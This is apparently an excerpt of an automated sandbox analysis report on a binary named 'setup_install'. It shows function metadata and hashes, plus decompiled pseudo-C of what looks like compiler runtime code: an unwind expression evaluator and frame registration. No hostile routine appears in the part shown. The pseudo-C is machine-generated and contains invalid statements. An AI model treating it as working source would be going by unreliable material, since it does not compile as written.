                                                                                                                            Function 00410F30 Relevance: 21.1, APIs: 14, Instructions: 128COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_getspecific.LIBWINPTHREAD-1(?,?,?,?,?,?,?,?,?,?,00495FEF), ref: 00410F4A
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00410F8F
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00410F9B
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00410FB2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_getspecificpthread_mutex_lockpthread_mutex_unlockpthread_once
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3632289657-0
                                                                                                                            • Opcode ID: 92f24faf408ba9c0854ba25ce3515e0fcf4748b5eb7404d1bbfda9eb3d4bff08
                                                                                                                            • Instruction ID: 051befa030404269d7deb140378f7ae4e6632df7119c1d2a2cfca13745e56604
                                                                                                                            • Opcode Fuzzy Hash: 92f24faf408ba9c0854ba25ce3515e0fcf4748b5eb7404d1bbfda9eb3d4bff08
                                                                                                                            • Instruction Fuzzy Hash: 7E513E749087098FC710EF65D48159AFBE4FF49744F01892EE9888B711E778E8C5CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E6C0 Relevance: 21.1, APIs: 14, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 26%
                                                                                                                            			E0040E6C0(void* __edx, void* __esi, char _a1, signed int _a20, intOrPtr _a24, signed int _a28, signed int _a44) {
				char _v1;
				void* _v16;
				char* _v40;
				struct HINSTANCE__* _t189;
				struct HINSTANCE__* _t192;
				_Unknown_base(*)()* _t193;
				CHAR* _t195;
				struct HINSTANCE__* _t197;
				void* _t202;
				_Unknown_base(*)()* _t203;
				void* _t208;
				char** _t209;
				char** _t210;
				struct HINSTANCE__** _t212;
				struct HINSTANCE__** _t213;

				L0:
				while(1) {
					L0:
					_t202 = __esi;
					if(_a20 == 0) {
						break;
					}
					L22:
					__ebp = __eax;
					__ebp =  &_v1;
					__edi =  *(__esp + 0x30 + __ebp * 4);
					__eflags = __dl - 0x1f;
					if(__eflags == 0) {
						L110:
						__edi =  ~__edi;
						__esi = __ebx;
					} else {
						L23:
						if(__eflags <= 0) {
							L97:
							__eflags = __dl - 6;
							if(__dl != 6) {
								L99:
								__eflags = __dl - 0x19;
								if(__dl != 0x19) {
									goto L96;
								} else {
									L100:
									__eax = __edi;
									__esi = __ebx;
									__eax = __edi >> 0x1f;
									__edi = __edi ^ __eax;
									__edi = __edi - __eax;
								}
							} else {
								L98:
								__edi =  *__edi;
								__esi = __ebx;
							}
						} else {
							L24:
							__eflags = __dl - 0x23;
							if(__dl == 0x23) {
								L102:
								__esi = 0;
								__ecx = 0;
								__eflags = 0;
								do {
									L103:
									__ebx = __ebx + 1;
									__edx =  *(__ebx - 1) & 0x000000ff;
									 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
									__eax = ( *(__ebx - 1) & 0x7f) << __cl;
									__ecx = __ecx + 7;
									__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
									__eflags = __dl;
								} while (__dl < 0);
								__edi = __edi + __esi;
								__esi = __ebx;
							} else {
								L25:
								__eflags = __dl - 0x94;
								if(__dl != 0x94) {
									L95:
									__eflags = __dl - 0x20;
									if(__dl == 0x20) {
										L109:
										__edi =  !__edi;
										__esi = __ebx;
									} else {
										goto L96;
									}
								} else {
									L26:
									__eax =  *(__esi + 1) & 0x000000ff;
									__edx = __esi + 2;
									__eflags = __al - 2;
									if(__eflags == 0) {
										L128:
										__edi =  *__edi & 0x0000ffff;
										__esi = __edx;
									} else {
										L27:
										if(__eflags <= 0) {
											L107:
											__eflags = __al - 1;
											if(__al != 1) {
												goto L96;
											} else {
												L108:
												__edi =  *__edi & 0x000000ff;
												__esi = __edx;
											}
										} else {
											L28:
											__eflags = __al - 4;
											if(__al == 4) {
												L30:
												__edi =  *__edi;
												__esi = __edx;
											} else {
												L29:
												__eflags = __al - 8;
												if(__al != 8) {
													L96:
													abort();
													goto L97;
												} else {
													goto L30;
												}
												while(1) {
													L10:
													__eflags = __ebp - 0x3f;
													if(__ebp > 0x3f) {
														goto L129;
													}
													L11:
													__eax =  &_a1;
													 *(__esp + 0x30 + __ebp * 4) = __edi;
													_a20 =  &_a1;
													while(1) {
														L12:
														__eflags = _a24 - __esi;
														if(_a24 <= __esi) {
															break;
														}
														L7:
														__eax =  *__esi & 0x000000ff;
														_t6 = __esi + 1; // 0x1
														__ebx = _t6;
														__ecx = __eax - 3;
														__edx = __eax;
														__eflags = __cl - 0xee;
														if(__cl > 0xee) {
															goto L96;
														} else {
															L8:
															__ecx = __cl & 0x000000ff;
															switch( *((intOrPtr*)(__ecx * 4 +  &M004A4A20))) {
																case 0:
																	L9:
																	__ebp = _a20;
																	__edi =  *(__esi + 1);
																	__esi = __esi + 5;
																	__eflags = __esi;
																	goto L10;
																case 1:
																	goto L96;
																case 2:
																	goto L0;
																case 3:
																	L21:
																	__edi =  *(__esi + 1) & 0x000000ff;
																	__ebp = _a20;
																	__esi = __esi + 2;
																	goto L10;
																case 4:
																	L20:
																	__edi =  *(__esi + 1);
																	__ebp = _a20;
																	__esi = __esi + 2;
																	goto L10;
																case 5:
																	L19:
																	__edi =  *(__esi + 1) & 0x0000ffff;
																	__ebp = _a20;
																	__esi = __esi + 3;
																	goto L10;
																case 6:
																	L18:
																	__edi =  *(__esi + 1);
																	__ebp = _a20;
																	__esi = __esi + 3;
																	goto L10;
																case 7:
																	L16:
																	__edi =  *(__esi + 1);
																	__ebp = _a20;
																	__esi = __esi + 9;
																	goto L10;
																case 8:
																	L67:
																	__esi = __ebx;
																	__edi = 0;
																	__ecx = 0;
																	__eflags = 0;
																	do {
																		L68:
																		__esi = __esi + 1;
																		__edx =  *(__esi - 1) & 0x000000ff;
																		 *(__esi - 1) & 0x000000ff =  *(__esi - 1) & 0x7f;
																		__eax = ( *(__esi - 1) & 0x7f) << __cl;
																		__ecx = __ecx + 7;
																		__edi = __edi | ( *(__esi - 1) & 0x7f) << __cl;
																		__eflags = __dl;
																	} while (__dl < 0);
																	__ebp = _a20;
																	goto L10;
																case 9:
																	L62:
																	__edi = 0;
																	__ecx = 0;
																	__eflags = 0;
																	do {
																		L63:
																		__ebx = __ebx + 1;
																		__edx =  *(__ebx - 1) & 0x000000ff;
																		__edx = __edx & 0x0000007f;
																		__eax = (__edx & 0x0000007f) << __cl;
																		__ecx = __ecx + 7;
																		__edi = __edi | (__edx & 0x0000007f) << __cl;
																		__eflags = __dl;
																	} while (__dl < 0);
																	__eflags = __ecx - 0x1f;
																	if(__ecx > 0x1f) {
																		goto L94;
																	} else {
																		L65:
																		__edx = __edx & 0x00000040;
																		__eflags = __edx;
																		if(__edx == 0) {
																			goto L94;
																		} else {
																			L66:
																			__eax = 1;
																			__ebp = _a20;
																			__esi = __ebx;
																			1 << __cl =  ~(1 << __cl);
																			__edi = __edi |  ~(1 << __cl);
																		}
																	}
																	goto L10;
																case 0xa:
																	L60:
																	__ebp = _a20;
																	__eflags = __ebp;
																	if(__ebp == 0) {
																		goto L129;
																	} else {
																		L61:
																		__edi =  *(__esp + 0x2c + __ebp * 4);
																		__esi = __ebx;
																		goto L10;
																	}
																	goto L142;
																case 0xb:
																	L58:
																	__eax = _a20;
																	__eflags = __eax;
																	if(__eax == 0) {
																		goto L129;
																	} else {
																		L59:
																		__eax = __eax - 1;
																		__esi = __ebx;
																		_a20 = __eax;
																		goto L12;
																	}
																	goto L142;
																case 0xc:
																	L56:
																	__ebp = _a20;
																	__eflags = __ebp - 1;
																	if(__ebp <= 1) {
																		goto L129;
																	} else {
																		L57:
																		__edi =  *(__esp + 0x28 + __ebp * 4);
																		__esi = __ebx;
																		goto L10;
																	}
																	goto L142;
																case 0xd:
																	L54:
																	__ebp = _a20;
																	__ecx =  *(__esi + 1) & 0x000000ff;
																	__edx = __esi + 2;
																	__eax =  &_v1;
																	__eflags = __ecx - __eax;
																	if(__ecx >= __eax) {
																		goto L129;
																	} else {
																		L55:
																		__eax = __eax - __ecx;
																		__esi = __edx;
																		__edi =  *(__esp + 0x30 + __eax * 4);
																		goto L10;
																	}
																	goto L142;
																case 0xe:
																	L89:
																	__eax = _a20;
																	__eflags = __eax - 1;
																	if(__eax <= 1) {
																		goto L129;
																	} else {
																		L90:
																		__edx = __eax - 1;
																		__eax = __eax - 2;
																		__esi =  *(__esp + 0x30 + __eax * 4);
																		__ecx =  *(__esp + 0x30 + __edx * 4);
																		 *(__esp + 0x30 + __edx * 4) =  *(__esp + 0x30 + __eax * 4);
																		__esi = __ebx;
																		 *(__esp + 0x30 + __eax * 4) =  *(__esp + 0x30 + __edx * 4);
																		goto L12;
																	}
																	goto L142;
																case 0xf:
																	L87:
																	__eax = _a20;
																	__eflags = __eax - 2;
																	if(__eax <= 2) {
																		goto L129;
																	} else {
																		L88:
																		__ecx = __eax - 1;
																		__edx = __eax - 2;
																		__eax = __eax - 3;
																		__esi =  *(__esp + 0x30 + __ecx * 4);
																		__ebp =  *(__esp + 0x30 + __edx * 4);
																		__edi =  *(__esp + 0x30 + __eax * 4);
																		 *(__esp + 0x30 + __ecx * 4) = __ebp;
																		 *(__esp + 0x30 + __edx * 4) = __edi;
																		 *(__esp + 0x30 + __eax * 4) =  *(__esp + 0x30 + __ecx * 4);
																		__esi = __ebx;
																		goto L12;
																	}
																	goto L142;
																case 0x10:
																	L91:
																	__eax = _a20;
																	__eflags = __eax - 1;
																	if(__eax <= 1) {
																		goto L129;
																	} else {
																		L92:
																		__ebp = __eax - 2;
																		__edx = __edx - 0x1a;
																		__ecx =  *(__esp + 0x2c + __eax * 4);
																		__edi =  *(__esp + 0x30 + __ebp * 4);
																		__eflags = __dl - 0x14;
																		if(__dl > 0x14) {
																			goto L96;
																		} else {
																			L93:
																			__edx = __dl & 0x000000ff;
																			switch( *((intOrPtr*)((__dl & 0x000000ff) * 4 +  &M004A4DDC))) {
																				case 0:
																					L111:
																					__edi = __edi & __ecx;
																					__esi = __ebx;
																					goto L10;
																				case 1:
																					L112:
																					__eax = __edi;
																					__esi = __ebx;
																					asm("cdq");
																					_t169 = __eax % __ecx;
																					__eax = __eax / __ecx;
																					__edx = _t169;
																					__edi = __eax;
																					goto L10;
																				case 2:
																					L113:
																					__edi = __edi - __ecx;
																					__esi = __ebx;
																					goto L10;
																				case 3:
																					L114:
																					__eax = __edi;
																					__edx = 0;
																					__esi = __ebx;
																					_t173 = __eax % __ecx;
																					__eax = __eax / __ecx;
																					__edx = _t173;
																					__edi = _t173;
																					goto L10;
																				case 4:
																					L115:
																					__edi = __edi * __ecx;
																					__esi = __ebx;
																					goto L10;
																				case 5:
																					goto L96;
																				case 6:
																					L116:
																					__edi = __edi | __ecx;
																					__esi = __ebx;
																					goto L10;
																				case 7:
																					L117:
																					__edi = __edi + __ecx;
																					__esi = __ebx;
																					goto L10;
																				case 8:
																					L118:
																					__edi = __edi << __cl;
																					__esi = __ebx;
																					goto L10;
																				case 9:
																					L119:
																					__edi = __edi >> __cl;
																					__esi = __ebx;
																					goto L10;
																				case 0xa:
																					L120:
																					__edi = __edi >> __cl;
																					__esi = __ebx;
																					goto L10;
																				case 0xb:
																					L121:
																					__edi = __edi ^ __ecx;
																					__esi = __ebx;
																					goto L10;
																				case 0xc:
																					L122:
																					__eax = 0;
																					__eflags = __edi - __ecx;
																					__esi = __ebx;
																					__eax = 0 | __eflags == 0x00000000;
																					__edi = __eflags == 0;
																					goto L10;
																				case 0xd:
																					L123:
																					__eax = 0;
																					__eflags = __edi - __ecx;
																					__esi = __ebx;
																					__eax = 0 | __eflags >= 0x00000000;
																					__edi = __eflags >= 0;
																					goto L10;
																				case 0xe:
																					L124:
																					__eax = 0;
																					__eflags = __edi - __ecx;
																					__esi = __ebx;
																					__eax = 0 | __eflags > 0x00000000;
																					__edi = __eflags > 0;
																					goto L10;
																				case 0xf:
																					L125:
																					__eax = 0;
																					__eflags = __edi - __ecx;
																					__esi = __ebx;
																					__eax = 0 | __eflags <= 0x00000000;
																					__edi = __eflags <= 0;
																					goto L10;
																				case 0x10:
																					L126:
																					__eax = 0;
																					__eflags = __edi - __ecx;
																					__esi = __ebx;
																					__eax = 0 | __eflags < 0x00000000;
																					__edi = __eflags < 0;
																					goto L10;
																				case 0x11:
																					L127:
																					__eax = 0;
																					__eflags = __edi - __ecx;
																					__esi = __ebx;
																					__eax = 0 | __eflags != 0x00000000;
																					__edi = __eflags != 0;
																					goto L10;
																			}
																		}
																		goto L10;
																	}
																	goto L142;
																case 0x11:
																	L82:
																	__eax = _a20;
																	__eflags = __eax;
																	if(__eax == 0) {
																		goto L129;
																	} else {
																		L83:
																		__eax = __eax - 1;
																		__edi = __eax;
																		_a20 = __eax;
																		__eax = __esi + 3;
																		__edx =  *(__esp + 0x30 + __edi * 4);
																		__eflags =  *(__esp + 0x30 + __edi * 4);
																		if( *(__esp + 0x30 + __edi * 4) == 0) {
																			__esi = __eax;
																		} else {
																			__esi =  *(__esi + 1);
																			__esi = __esi + __eax;
																		}
																		goto L12;
																	}
																	goto L142;
																case 0x12:
																	L86:
																	__eax =  *(__esi + 1);
																	__esi = __esi +  *(__esi + 1) + 3;
																	goto L12;
																case 0x13:
																	L85:
																	__edi = __eax - 0x30;
																	__ebp = _a20;
																	__esi = __ebx;
																	goto L10;
																case 0x14:
																	L49:
																	__eax = __eax - 0x50;
																	__eflags = __eax - 0x11;
																	if(__eax > 0x11) {
																		goto L129;
																	} else {
																		L50:
																		__esi = _a28;
																		__edx =  *(__eax + 0x4e53f8) & 0x000000ff;
																		__edi =  *(__esi + __eax * 4);
																		__eflags =  *(__esi + 0x63) & 0x00000040;
																		if(( *(__esi + 0x63) & 0x00000040) == 0) {
																			L52:
																			__eflags = __dl - 4;
																			if(__dl == 4) {
																				goto L38;
																			} else {
																				L53:
																				goto L129;
																			}
																		} else {
																			L51:
																			__eflags =  *((char*)(__esi + __eax + 0x6c));
																			if( *((char*)(__esi + __eax + 0x6c)) != 0) {
																				goto L94;
																			} else {
																				goto L52;
																			}
																		}
																	}
																	goto L142;
																case 0x15:
																	L39:
																	__ebp = 0;
																	__ecx = 0;
																	__eflags = 0;
																	__esi = __eax;
																	do {
																		L40:
																		__ebx = __ebx + 1;
																		__eax =  *(__ebx - 1) & 0x000000ff;
																		__eax = __eax & 0x0000007f;
																		__edx = (__eax & 0x0000007f) << __cl;
																		__ecx = __ecx + 7;
																		__ebp = __ebp | (__eax & 0x0000007f) << __cl;
																		__eflags = __al;
																	} while (__al < 0);
																	__edi = __eax;
																	__eax = __esi;
																	__esi = __edi;
																	__eflags = __ecx - 0x1f;
																	if(__ecx <= 0x1f) {
																		__esi = __esi & 0x00000040;
																		__eflags = __esi;
																		if(__esi != 0) {
																			1 = 1 << __cl;
																			__edx =  ~(1 << __cl);
																			__ebp = __ebp |  ~(1 << __cl);
																		}
																	}
																	__eax = __eax - 0x70;
																	__eflags = __eax - 0x11;
																	if(__eax > 0x11) {
																		goto L129;
																	} else {
																		L44:
																		__esi = _a28;
																		__edx =  *(__eax + 0x4e53f8) & 0x000000ff;
																		__edi =  *(__esi + __eax * 4);
																		__eflags =  *(__esi + 0x63) & 0x00000040;
																		if(( *(__esi + 0x63) & 0x00000040) == 0) {
																			L46:
																			__eflags = __dl - 4;
																			if(__dl != 4) {
																				goto L129;
																			} else {
																				L47:
																				__edi =  *__edi;
																				goto L48;
																			}
																		} else {
																			L45:
																			__eflags =  *((char*)(__esi + __eax + 0x6c));
																			if( *((char*)(__esi + __eax + 0x6c)) != 0) {
																				L48:
																				__edi = __edi + __ebp;
																				__esi = __ebx;
																				__ebp = _a20;
																				goto L10;
																			} else {
																				goto L46;
																			}
																		}
																	}
																	goto L142;
																case 0x16:
																	L32:
																	__esi = 0;
																	__ecx = 0;
																	__eflags = 0;
																	do {
																		L33:
																		__ebx = __ebx + 1;
																		__edx =  *(__ebx - 1) & 0x000000ff;
																		 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
																		__eax = ( *(__ebx - 1) & 0x7f) << __cl;
																		__ecx = __ecx + 7;
																		__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
																		__eflags = __dl;
																	} while (__dl < 0);
																	__eflags = __esi - 0x11;
																	if(__esi > 0x11) {
																		goto L129;
																	} else {
																		L35:
																		__ecx = _a28;
																		__eax =  *(__esi + 0x4e53f8) & 0x000000ff;
																		__edi =  *(__ecx + __esi * 4);
																		__eflags =  *(__ecx + 0x63) & 0x00000040;
																		if(( *(__ecx + 0x63) & 0x00000040) == 0) {
																			L37:
																			__eflags = __al - 4;
																			if(__al != 4) {
																				goto L129;
																			} else {
																				L38:
																				__edi =  *__edi;
																				__ebp = _a20;
																				__esi = __ebx;
																				goto L10;
																			}
																		} else {
																			L36:
																			__eflags =  *((char*)(__ecx + __esi + 0x6c));
																			if( *((char*)(__ecx + __esi + 0x6c)) != 0) {
																				L94:
																				__ebp = _a20;
																				__esi = __ebx;
																				goto L10;
																			} else {
																				goto L37;
																			}
																		}
																	}
																	goto L142;
																case 0x17:
																	L70:
																	__esi = 0;
																	__ecx = 0;
																	__eflags = 0;
																	do {
																		L71:
																		__ebx = __ebx + 1;
																		__edx =  *(__ebx - 1) & 0x000000ff;
																		 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
																		__eax = ( *(__ebx - 1) & 0x7f) << __cl;
																		__ecx = __ecx + 7;
																		__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
																		__eflags = __dl;
																	} while (__dl < 0);
																	__edi = 0;
																	__ecx = 0;
																	__eflags = 0;
																	do {
																		L73:
																		__ebx = __ebx + 1;
																		__eax =  *(__ebx - 1) & 0x000000ff;
																		 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
																		__edx = ( *(__ebx - 1) & 0x7f) << __cl;
																		__ecx = __ecx + 7;
																		__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
																		__eflags = __al;
																	} while (__al < 0);
																	__eflags = __ecx - 0x1f;
																	if(__ecx <= 0x1f) {
																		__eflags = __al & 0x00000040;
																		if((__al & 0x00000040) != 0) {
																			1 = 1 << __cl;
																			__eax =  ~(1 << __cl);
																			__edi = __edi |  ~(1 << __cl);
																		}
																	}
																	__eflags = __esi - 0x11;
																	if(__esi > 0x11) {
																		goto L129;
																	} else {
																		L77:
																		__ecx = _a28;
																		__edx =  *(__esi + 0x4e53f8) & 0x000000ff;
																		__eax =  *(__ecx + __esi * 4);
																		__eflags =  *(__ecx + 0x63) & 0x00000040;
																		if(( *(__ecx + 0x63) & 0x00000040) == 0) {
																			L79:
																			__eflags = __dl - 4;
																			if(__dl != 4) {
																				goto L129;
																			} else {
																				L80:
																				__eax =  *__eax;
																				goto L81;
																			}
																		} else {
																			L78:
																			__eflags =  *((char*)(__ecx + __esi + 0x6c));
																			if( *((char*)(__ecx + __esi + 0x6c)) != 0) {
																				L81:
																				__edi = __edi + __eax;
																				__ebp = _a20;
																				__esi = __ebx;
																				goto L10;
																			} else {
																				goto L79;
																			}
																		}
																	}
																	goto L142;
																case 0x18:
																	L17:
																	__esi = __ebx;
																	goto L12;
																case 0x19:
																	L31:
																	__ebx =  *(__esi + 1) & 0x000000ff;
																	__edx = _a28;
																	__edi =  &_a44;
																	__eax = __ebx;
																	__eax = E0040D720(__ebx, __ecx, _a28);
																	 *__esp =  &_a44;
																	__ecx = __esi + 2;
																	__edx = __eax;
																	__eax = __ebx;
																	__eax = E0040D5E0(__ebx, __esi + 2, __edx);
																	__edi = _a44;
																	__ebp = _a20;
																	__esi = __eax;
																	goto L10;
															}
														}
														L142:
													}
													L13:
													__eax = _a20;
													__eflags = __eax;
													if(__eax == 0) {
														goto L129;
													} else {
														L14:
														__eax =  *(__esp + 0x2c + __eax * 4);
														__esp = __esp + 0x13c;
														_pop(__ebx);
														_pop(__esi);
														_pop(__edi);
														_pop(__ebp);
														return __eax;
													}
													goto L142;
												}
												break;
											}
										}
									}
								}
							}
						}
					}
					goto L10;
				}
				L129:
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				_push(_t202);
				_t209 = _t208 - 0x1c;
				 *_t209 = "libgcc_s_dw2-1.dll";
				_t189 = GetModuleHandleA(_t195);
				_t210 = _t209 - 4;
				if(_t189 == 0) {
					 *0x49f004 = 0x410d00;
					_t203 = E00410B90;
				} else {
					_t197 = _t189;
					 *_t210 = "libgcc_s_dw2-1.dll";
					_t192 = LoadLibraryA(??);
					_t212 = _t210 - 4;
					 *0x4e5df0 = _t192;
					_v40 = "__register_frame_info";
					 *_t212 = _t197;
					_t193 = GetProcAddress(??, ??);
					_t213 = _t212 - 8;
					_t203 = _t193;
					_v40 = "__deregister_frame_info";
					 *_t213 = _t197;
					 *0x49f004 = GetProcAddress(??, ??);
					_t210 = _t213 - 8;
				}
				if(_t203 != 0) {
					_v40 = 0x4e501c;
					 *_t210 = 0x4ab0f8;
					 *_t203();
				}
				 *_t210 = E00401590;
				return E004014C0();
				goto L142;
			}


















                                                                                                                            0x0040e6c0
                                                                                                                            0x0040e6c0
                                                                                                                            0x0040e6c0
                                                                                                                            0x0040e6c0
                                                                                                                            0x0040e6c6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6cc
                                                                                                                            0x0040e6cc
                                                                                                                            0x0040e6ce
                                                                                                                            0x0040e6d1
                                                                                                                            0x0040e6d5
                                                                                                                            0x0040e6d8
                                                                                                                            0x0040eb79
                                                                                                                            0x0040eb79
                                                                                                                            0x0040eb7b
                                                                                                                            0x0040e6de
                                                                                                                            0x0040e6de
                                                                                                                            0x0040e6de
                                                                                                                            0x0040eae0
                                                                                                                            0x0040eae0
                                                                                                                            0x0040eae3
                                                                                                                            0x0040eaf0
                                                                                                                            0x0040eaf0
                                                                                                                            0x0040eaf3
                                                                                                                            0x00000000
                                                                                                                            0x0040eaf5
                                                                                                                            0x0040eaf5
                                                                                                                            0x0040eaf5
                                                                                                                            0x0040eaf7
                                                                                                                            0x0040eaf9
                                                                                                                            0x0040eafc
                                                                                                                            0x0040eafe
                                                                                                                            0x0040eafe
                                                                                                                            0x0040eae5
                                                                                                                            0x0040eae5
                                                                                                                            0x0040eae5
                                                                                                                            0x0040eae7
                                                                                                                            0x0040eae7
                                                                                                                            0x0040e6e4
                                                                                                                            0x0040e6e4
                                                                                                                            0x0040e6e4
                                                                                                                            0x0040e6e7
                                                                                                                            0x0040eb10
                                                                                                                            0x0040eb10
                                                                                                                            0x0040eb12
                                                                                                                            0x0040eb12
                                                                                                                            0x0040eb14
                                                                                                                            0x0040eb14
                                                                                                                            0x0040eb14
                                                                                                                            0x0040eb17
                                                                                                                            0x0040eb1d
                                                                                                                            0x0040eb20
                                                                                                                            0x0040eb22
                                                                                                                            0x0040eb25
                                                                                                                            0x0040eb27
                                                                                                                            0x0040eb27
                                                                                                                            0x0040eb2b
                                                                                                                            0x0040eb2d
                                                                                                                            0x0040e6ed
                                                                                                                            0x0040e6ed
                                                                                                                            0x0040e6ed
                                                                                                                            0x0040e6f0
                                                                                                                            0x0040ead0
                                                                                                                            0x0040ead0
                                                                                                                            0x0040ead3
                                                                                                                            0x0040eb70
                                                                                                                            0x0040eb70
                                                                                                                            0x0040eb72
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6f6
                                                                                                                            0x0040e6f6
                                                                                                                            0x0040e6f6
                                                                                                                            0x0040e6fa
                                                                                                                            0x0040e6fd
                                                                                                                            0x0040e6ff
                                                                                                                            0x0040ec51
                                                                                                                            0x0040ec51
                                                                                                                            0x0040ec54
                                                                                                                            0x0040e705
                                                                                                                            0x0040e705
                                                                                                                            0x0040e705
                                                                                                                            0x0040eb54
                                                                                                                            0x0040eb54
                                                                                                                            0x0040eb56
                                                                                                                            0x00000000
                                                                                                                            0x0040eb5c
                                                                                                                            0x0040eb5c
                                                                                                                            0x0040eb5c
                                                                                                                            0x0040eb5f
                                                                                                                            0x0040eb5f
                                                                                                                            0x0040e70b
                                                                                                                            0x0040e70b
                                                                                                                            0x0040e70b
                                                                                                                            0x0040e70d
                                                                                                                            0x0040e717
                                                                                                                            0x0040e717
                                                                                                                            0x0040e719
                                                                                                                            0x0040e70f
                                                                                                                            0x0040e70f
                                                                                                                            0x0040e70f
                                                                                                                            0x0040e711
                                                                                                                            0x0040ead9
                                                                                                                            0x0040ead9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e640
                                                                                                                            0x0040e640
                                                                                                                            0x0040e640
                                                                                                                            0x0040e643
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e649
                                                                                                                            0x0040e649
                                                                                                                            0x0040e64c
                                                                                                                            0x0040e650
                                                                                                                            0x0040e654
                                                                                                                            0x0040e654
                                                                                                                            0x0040e654
                                                                                                                            0x0040e658
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e610
                                                                                                                            0x0040e610
                                                                                                                            0x0040e613
                                                                                                                            0x0040e613
                                                                                                                            0x0040e616
                                                                                                                            0x0040e619
                                                                                                                            0x0040e61b
                                                                                                                            0x0040e61e
                                                                                                                            0x00000000
                                                                                                                            0x0040e624
                                                                                                                            0x0040e624
                                                                                                                            0x0040e624
                                                                                                                            0x0040e627
                                                                                                                            0x00000000
                                                                                                                            0x0040e630
                                                                                                                            0x0040e630
                                                                                                                            0x0040e634
                                                                                                                            0x0040e637
                                                                                                                            0x0040e637
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6b0
                                                                                                                            0x0040e6b0
                                                                                                                            0x0040e6b4
                                                                                                                            0x0040e6b8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e6a0
                                                                                                                            0x0040e6a0
                                                                                                                            0x0040e6a4
                                                                                                                            0x0040e6a8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e692
                                                                                                                            0x0040e692
                                                                                                                            0x0040e696
                                                                                                                            0x0040e69a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e685
                                                                                                                            0x0040e685
                                                                                                                            0x0040e689
                                                                                                                            0x0040e68d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e675
                                                                                                                            0x0040e675
                                                                                                                            0x0040e678
                                                                                                                            0x0040e67c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e933
                                                                                                                            0x0040e933
                                                                                                                            0x0040e935
                                                                                                                            0x0040e937
                                                                                                                            0x0040e937
                                                                                                                            0x0040e940
                                                                                                                            0x0040e940
                                                                                                                            0x0040e940
                                                                                                                            0x0040e943
                                                                                                                            0x0040e949
                                                                                                                            0x0040e94c
                                                                                                                            0x0040e94e
                                                                                                                            0x0040e951
                                                                                                                            0x0040e953
                                                                                                                            0x0040e953
                                                                                                                            0x0040e957
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e8f0
                                                                                                                            0x0040e8f0
                                                                                                                            0x0040e8f2
                                                                                                                            0x0040e8f2
                                                                                                                            0x0040e8f4
                                                                                                                            0x0040e8f4
                                                                                                                            0x0040e8f4
                                                                                                                            0x0040e8f7
                                                                                                                            0x0040e8fd
                                                                                                                            0x0040e900
                                                                                                                            0x0040e902
                                                                                                                            0x0040e905
                                                                                                                            0x0040e907
                                                                                                                            0x0040e907
                                                                                                                            0x0040e90b
                                                                                                                            0x0040e90e
                                                                                                                            0x00000000
                                                                                                                            0x0040e914
                                                                                                                            0x0040e914
                                                                                                                            0x0040e914
                                                                                                                            0x0040e914
                                                                                                                            0x0040e917
                                                                                                                            0x00000000
                                                                                                                            0x0040e91d
                                                                                                                            0x0040e91d
                                                                                                                            0x0040e91d
                                                                                                                            0x0040e922
                                                                                                                            0x0040e926
                                                                                                                            0x0040e92a
                                                                                                                            0x0040e92c
                                                                                                                            0x0040e92c
                                                                                                                            0x0040e917
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e8d0
                                                                                                                            0x0040e8d0
                                                                                                                            0x0040e8d4
                                                                                                                            0x0040e8d6
                                                                                                                            0x00000000
                                                                                                                            0x0040e8dc
